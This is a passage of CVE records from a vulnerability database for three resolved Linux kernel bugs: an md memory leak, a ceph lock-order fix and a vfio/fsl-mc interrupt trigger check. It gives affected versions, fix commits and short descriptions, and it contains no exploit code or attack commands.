"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35915",
"datePublished": "2024-05-19T08:35:08.239Z",
"dateReserved": "2024-05-17T13:50:33.122Z",
"dateUpdated": "2025-05-04T09:08:17.927Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26900 (GCVE-0-2024-26900)
Vulnerability from cvelistv5
Published
2024-04-17 10:27
Modified
2025-05-04 08:59
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
md: fix kmemleak of rdev->serial
If kobject_add() is fail in bind_rdev_to_array(), 'rdev->serial' will be
alloc not be freed, and kmemleak occurs.
unreferenced object 0xffff88815a350000 (size 49152):
comm "mdadm", pid 789, jiffies 4294716910
hex dump (first 32 bytes):
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
backtrace (crc f773277a):
[<0000000058b0a453>] kmemleak_alloc+0x61/0xe0
[<00000000366adf14>] __kmalloc_large_node+0x15e/0x270
[<000000002e82961b>] __kmalloc_node.cold+0x11/0x7f
[<00000000f206d60a>] kvmalloc_node+0x74/0x150
[<0000000034bf3363>] rdev_init_serial+0x67/0x170
[<0000000010e08fe9>] mddev_create_serial_pool+0x62/0x220
[<00000000c3837bf0>] bind_rdev_to_array+0x2af/0x630
[<0000000073c28560>] md_add_new_disk+0x400/0x9f0
[<00000000770e30ff>] md_ioctl+0x15bf/0x1c10
[<000000006cfab718>] blkdev_ioctl+0x191/0x3f0
[<0000000085086a11>] vfs_ioctl+0x22/0x60
[<0000000018b656fe>] __x64_sys_ioctl+0xba/0xe0
[<00000000e54e675e>] do_syscall_64+0x71/0x150
[<000000008b0ad622>] entry_SYSCALL_64_after_hwframe+0x6c/0x74
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 963c555e75b033202dd76cf6325a7b7c83d08d5f Version: 963c555e75b033202dd76cf6325a7b7c83d08d5f Version: 963c555e75b033202dd76cf6325a7b7c83d08d5f Version: 963c555e75b033202dd76cf6325a7b7c83d08d5f Version: 963c555e75b033202dd76cf6325a7b7c83d08d5f Version: 963c555e75b033202dd76cf6325a7b7c83d08d5f Version: 963c555e75b033202dd76cf6325a7b7c83d08d5f |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-09-12T16:02:57.919Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fb5b347efd1bda989846ffc74679d181222fb123"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f3a1787dc48213f6caea5ba7d47e0222e7fa34a9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/beaf11969fd5cbe6f09cefaa34df1ce8578e8dd9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9fd0198f7ef06ae0d6636fb0578560857dead995"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6d32c832a88513f65c2c2c9c75954ee8b387adea"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4c1021ce46fc2fb6115f7e79d353941e6dcad366"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6cf350658736681b9d6b0b6e58c5c76b235bb4c4"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00019.html"
},
{
"url": "https://security.netapp.com/advisory/ntap-20240912-0011/"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26900",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:48:06.560564Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:23.408Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/md/md.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "fb5b347efd1bda989846ffc74679d181222fb123",
"status": "affected",
"version": "963c555e75b033202dd76cf6325a7b7c83d08d5f",
"versionType": "git"
},
{
"lessThan": "f3a1787dc48213f6caea5ba7d47e0222e7fa34a9",
"status": "affected",
"version": "963c555e75b033202dd76cf6325a7b7c83d08d5f",
"versionType": "git"
},
{
"lessThan": "beaf11969fd5cbe6f09cefaa34df1ce8578e8dd9",
"status": "affected",
"version": "963c555e75b033202dd76cf6325a7b7c83d08d5f",
"versionType": "git"
},
{
"lessThan": "9fd0198f7ef06ae0d6636fb0578560857dead995",
"status": "affected",
"version": "963c555e75b033202dd76cf6325a7b7c83d08d5f",
"versionType": "git"
},
{
"lessThan": "6d32c832a88513f65c2c2c9c75954ee8b387adea",
"status": "affected",
"version": "963c555e75b033202dd76cf6325a7b7c83d08d5f",
"versionType": "git"
},
{
"lessThan": "4c1021ce46fc2fb6115f7e79d353941e6dcad366",
"status": "affected",
"version": "963c555e75b033202dd76cf6325a7b7c83d08d5f",
"versionType": "git"
},
{
"lessThan": "6cf350658736681b9d6b0b6e58c5c76b235bb4c4",
"status": "affected",
"version": "963c555e75b033202dd76cf6325a7b7c83d08d5f",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/md/md.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.3"
},
{
"lessThan": "5.3",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.217",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.159",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.91",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.31",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.217",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.159",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.91",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.31",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "5.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmd: fix kmemleak of rdev-\u003eserial\n\nIf kobject_add() is fail in bind_rdev_to_array(), \u0027rdev-\u003eserial\u0027 will be\nalloc not be freed, and kmemleak occurs.\n\nunreferenced object 0xffff88815a350000 (size 49152):\n comm \"mdadm\", pid 789, jiffies 4294716910\n hex dump (first 32 bytes):\n 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n backtrace (crc f773277a):\n [\u003c0000000058b0a453\u003e] kmemleak_alloc+0x61/0xe0\n [\u003c00000000366adf14\u003e] __kmalloc_large_node+0x15e/0x270\n [\u003c000000002e82961b\u003e] __kmalloc_node.cold+0x11/0x7f\n [\u003c00000000f206d60a\u003e] kvmalloc_node+0x74/0x150\n [\u003c0000000034bf3363\u003e] rdev_init_serial+0x67/0x170\n [\u003c0000000010e08fe9\u003e] mddev_create_serial_pool+0x62/0x220\n [\u003c00000000c3837bf0\u003e] bind_rdev_to_array+0x2af/0x630\n [\u003c0000000073c28560\u003e] md_add_new_disk+0x400/0x9f0\n [\u003c00000000770e30ff\u003e] md_ioctl+0x15bf/0x1c10\n [\u003c000000006cfab718\u003e] blkdev_ioctl+0x191/0x3f0\n [\u003c0000000085086a11\u003e] vfs_ioctl+0x22/0x60\n [\u003c0000000018b656fe\u003e] __x64_sys_ioctl+0xba/0xe0\n [\u003c00000000e54e675e\u003e] do_syscall_64+0x71/0x150\n [\u003c000000008b0ad622\u003e] entry_SYSCALL_64_after_hwframe+0x6c/0x74"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:59:13.975Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/fb5b347efd1bda989846ffc74679d181222fb123"
},
{
"url": "https://git.kernel.org/stable/c/f3a1787dc48213f6caea5ba7d47e0222e7fa34a9"
},
{
"url": "https://git.kernel.org/stable/c/beaf11969fd5cbe6f09cefaa34df1ce8578e8dd9"
},
{
"url": "https://git.kernel.org/stable/c/9fd0198f7ef06ae0d6636fb0578560857dead995"
},
{
"url": "https://git.kernel.org/stable/c/6d32c832a88513f65c2c2c9c75954ee8b387adea"
},
{
"url": "https://git.kernel.org/stable/c/4c1021ce46fc2fb6115f7e79d353941e6dcad366"
},
{
"url": "https://git.kernel.org/stable/c/6cf350658736681b9d6b0b6e58c5c76b235bb4c4"
}
],
"title": "md: fix kmemleak of rdev-\u003eserial",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26900",
"datePublished": "2024-04-17T10:27:49.707Z",
"dateReserved": "2024-02-19T14:20:24.187Z",
"dateUpdated": "2025-05-04T08:59:13.975Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52583 (GCVE-0-2023-52583)
Vulnerability from cvelistv5
Published
2024-03-06 06:45
Modified
2025-05-04 07:39
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ceph: fix deadlock or deadcode of misusing dget()
The lock order is incorrect between denty and its parent, we should
always make sure that the parent get the lock first.
But since this deadcode is never used and the parent dir will always
be set from the callers, let's just remove it.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 9030aaf9bf0a1eee47a154c316c789e959638b0f Version: 9030aaf9bf0a1eee47a154c316c789e959638b0f Version: 9030aaf9bf0a1eee47a154c316c789e959638b0f Version: 9030aaf9bf0a1eee47a154c316c789e959638b0f Version: 9030aaf9bf0a1eee47a154c316c789e959638b0f Version: 9030aaf9bf0a1eee47a154c316c789e959638b0f Version: 9030aaf9bf0a1eee47a154c316c789e959638b0f Version: 9030aaf9bf0a1eee47a154c316c789e959638b0f |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52583",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-03-06T16:25:29.028372Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:24:14.471Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:21.182Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/eb55ba8aa7fb7aad54f40fbf4d8dcdfdba0bebf6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6ab4fd508fad942f1f1ba940492f2735e078e980"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e016e358461b89b231626fcf78c5c38e35c44fd3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a9c15d6e8aee074fae66c04d114f20b84274fcca"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7f2649c94264d00df6b6ac27161e9f4372a3450e"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/196b87e5c00ce021e164a5de0f0d04f4116a9160"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/76cb2aa3421fee4fde706dec41b1344bc0a9ad67"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b493ad718b1f0357394d2cdecbf00a44a36fa085"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/ceph/caps.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "eb55ba8aa7fb7aad54f40fbf4d8dcdfdba0bebf6",
"status": "affected",
"version": "9030aaf9bf0a1eee47a154c316c789e959638b0f",
"versionType": "git"
},
{
"lessThan": "6ab4fd508fad942f1f1ba940492f2735e078e980",
"status": "affected",
"version": "9030aaf9bf0a1eee47a154c316c789e959638b0f",
"versionType": "git"
},
{
"lessThan": "e016e358461b89b231626fcf78c5c38e35c44fd3",
"status": "affected",
"version": "9030aaf9bf0a1eee47a154c316c789e959638b0f",
"versionType": "git"
},
{
"lessThan": "a9c15d6e8aee074fae66c04d114f20b84274fcca",
"status": "affected",
"version": "9030aaf9bf0a1eee47a154c316c789e959638b0f",
"versionType": "git"
},
{
"lessThan": "7f2649c94264d00df6b6ac27161e9f4372a3450e",
"status": "affected",
"version": "9030aaf9bf0a1eee47a154c316c789e959638b0f",
"versionType": "git"
},
{
"lessThan": "196b87e5c00ce021e164a5de0f0d04f4116a9160",
"status": "affected",
"version": "9030aaf9bf0a1eee47a154c316c789e959638b0f",
"versionType": "git"
},
{
"lessThan": "76cb2aa3421fee4fde706dec41b1344bc0a9ad67",
"status": "affected",
"version": "9030aaf9bf0a1eee47a154c316c789e959638b0f",
"versionType": "git"
},
{
"lessThan": "b493ad718b1f0357394d2cdecbf00a44a36fa085",
"status": "affected",
"version": "9030aaf9bf0a1eee47a154c316c789e959638b0f",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/ceph/caps.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.34"
},
{
"lessThan": "2.6.34",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.307",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.77",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.16",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.307",
"versionStartIncluding": "2.6.34",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"versionStartIncluding": "2.6.34",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "2.6.34",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "2.6.34",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.77",
"versionStartIncluding": "2.6.34",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.16",
"versionStartIncluding": "2.6.34",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.4",
"versionStartIncluding": "2.6.34",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "2.6.34",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nceph: fix deadlock or deadcode of misusing dget()\n\nThe lock order is incorrect between denty and its parent, we should\nalways make sure that the parent get the lock first.\n\nBut since this deadcode is never used and the parent dir will always\nbe set from the callers, let\u0027s just remove it."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:39:12.524Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/eb55ba8aa7fb7aad54f40fbf4d8dcdfdba0bebf6"
},
{
"url": "https://git.kernel.org/stable/c/6ab4fd508fad942f1f1ba940492f2735e078e980"
},
{
"url": "https://git.kernel.org/stable/c/e016e358461b89b231626fcf78c5c38e35c44fd3"
},
{
"url": "https://git.kernel.org/stable/c/a9c15d6e8aee074fae66c04d114f20b84274fcca"
},
{
"url": "https://git.kernel.org/stable/c/7f2649c94264d00df6b6ac27161e9f4372a3450e"
},
{
"url": "https://git.kernel.org/stable/c/196b87e5c00ce021e164a5de0f0d04f4116a9160"
},
{
"url": "https://git.kernel.org/stable/c/76cb2aa3421fee4fde706dec41b1344bc0a9ad67"
},
{
"url": "https://git.kernel.org/stable/c/b493ad718b1f0357394d2cdecbf00a44a36fa085"
}
],
"title": "ceph: fix deadlock or deadcode of misusing dget()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52583",
"datePublished": "2024-03-06T06:45:19.319Z",
"dateReserved": "2024-03-02T21:55:42.569Z",
"dateUpdated": "2025-05-04T07:39:12.524Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26814 (GCVE-0-2024-26814)
Vulnerability from cvelistv5
Published
2024-04-05 08:24
Modified
2025-05-04 08:57
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
vfio/fsl-mc: Block calling interrupt handler without trigger
The eventfd_ctx trigger pointer of the vfio_fsl_mc_irq object is
initially NULL and may become NULL if the user sets the trigger
eventfd to -1. The interrupt handler itself is guaranteed that
trigger is always valid between request_irq() and free_irq(), but
the loopback testing mechanisms to invoke the handler function
need to test the trigger. The triggering and setting ioctl paths
both make use of igate and are therefore mutually exclusive.
The vfio-fsl-mc driver does not make use of irqfds, nor does it
support any sort of masking operations, therefore unlike vfio-pci
and vfio-platform, the flow can remain essentially unchanged.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: cc0ee20bd96971c10eba9a83ecf1c0733078a083 Version: cc0ee20bd96971c10eba9a83ecf1c0733078a083 Version: cc0ee20bd96971c10eba9a83ecf1c0733078a083 Version: cc0ee20bd96971c10eba9a83ecf1c0733078a083 Version: cc0ee20bd96971c10eba9a83ecf1c0733078a083 Version: cc0ee20bd96971c10eba9a83ecf1c0733078a083 Version: cc0ee20bd96971c10eba9a83ecf1c0733078a083 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:13.574Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a563fc18583ca4f42e2fdd0c70c7c618288e7ede"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/250219c6a556f8c69c5910fca05a59037e24147d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/083e750c9f5f4c3bf61161330fb84d7c8e8bb417"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ee0bd4ad780dfbb60355b99f25063357ab488267"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/de87511fb0404d23b6da5f4660383b6ed095e28d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6ec0d88166dac43f29e96801c0927d514f17add9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7447d911af699a15f8d050dfcb7c680a86f87012"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26814",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:50:33.742029Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:43.653Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/vfio/fsl-mc/vfio_fsl_mc_intr.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "a563fc18583ca4f42e2fdd0c70c7c618288e7ede",
"status": "affected",
"version": "cc0ee20bd96971c10eba9a83ecf1c0733078a083",
"versionType": "git"
},
{
"lessThan": "250219c6a556f8c69c5910fca05a59037e24147d",
"status": "affected",
"version": "cc0ee20bd96971c10eba9a83ecf1c0733078a083",
"versionType": "git"
},
{
"lessThan": "083e750c9f5f4c3bf61161330fb84d7c8e8bb417",
"status": "affected",
"version": "cc0ee20bd96971c10eba9a83ecf1c0733078a083",
"versionType": "git"
},
{
"lessThan": "ee0bd4ad780dfbb60355b99f25063357ab488267",
"status": "affected",
"version": "cc0ee20bd96971c10eba9a83ecf1c0733078a083",
"versionType": "git"
},
{
"lessThan": "de87511fb0404d23b6da5f4660383b6ed095e28d",
"status": "affected",
"version": "cc0ee20bd96971c10eba9a83ecf1c0733078a083",
"versionType": "git"
},
{
"lessThan": "6ec0d88166dac43f29e96801c0927d514f17add9",
"status": "affected",
"version": "cc0ee20bd96971c10eba9a83ecf1c0733078a083",
"versionType": "git"
},
{
"lessThan": "7447d911af699a15f8d050dfcb7c680a86f87012",
"status": "affected",
"version": "cc0ee20bd96971c10eba9a83ecf1c0733078a083",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/vfio/fsl-mc/vfio_fsl_mc_intr.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.10"
},
{
"lessThan": "5.10",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.84",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.24",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.154",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.84",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.24",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.12",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.3",
"versionStartIncluding": "5.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nvfio/fsl-mc: Block calling interrupt handler without trigger\n\nThe eventfd_ctx trigger pointer of the vfio_fsl_mc_irq object is\ninitially NULL and may become NULL if the user sets the trigger\neventfd to -1. The interrupt handler itself is guaranteed that\ntrigger is always valid between request_irq() and free_irq(), but\nthe loopback testing mechanisms to invoke the handler function\nneed to test the trigger. The triggering and setting ioctl paths\nboth make use of igate and are therefore mutually exclusive.\n\nThe vfio-fsl-mc driver does not make use of irqfds, nor does it\nsupport any sort of masking operations, therefore unlike vfio-pci\nand vfio-platform, the flow can remain essentially unchanged."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:57:10.359Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/a563fc18583ca4f42e2fdd0c70c7c618288e7ede"
},
{
"url": "https://git.kernel.org/stable/c/250219c6a556f8c69c5910fca05a59037e24147d"
},
{
"url": "https://git.kernel.org/stable/c/083e750c9f5f4c3bf61161330fb84d7c8e8bb417"
},
{
"url": "https://git.kernel.org/stable/c/ee0bd4ad780dfbb60355b99f25063357ab488267"
},
{
"url": "https://git.kernel.org/stable/c/de87511fb0404d23b6da5f4660383b6ed095e28d"
},
{
"url": "https://git.kernel.org/stable/c/6ec0d88166dac43f29e96801c0927d514f17add9"
},
{
